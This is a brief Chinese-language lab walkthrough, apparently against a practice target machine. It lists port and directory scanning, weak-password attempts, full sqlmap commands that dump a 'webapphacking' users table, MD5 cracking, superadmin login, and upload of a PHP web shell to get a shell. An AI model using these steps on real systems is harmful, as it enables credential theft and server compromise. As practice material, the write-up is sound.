1.靶机
2.扫描ip端口和目录
3.弱口令登录 没成功
4.发现有个注册 注册上看看
输了个hei 结果密码要六个字符
5.注册好登录
6.搜个书名看看url的变化
试了好几次页面没变化 直接点search
python3 sqlmap.py -r 1.txt --current-db --batch
python3 sqlmap.py -r 1.txt -D webapphacking --tables --batch
python3 sqlmap.py -r 1.txt -D webapphacking -T users --columns --batch
python3 sqlmap.py -r 1.txt -D webapphacking -T users --dump --batch
去md5解密一下
然后登录superadmin
然后上传一个马
在之前找的uploads目录看看 1.php被上传成功了 那就能getshell了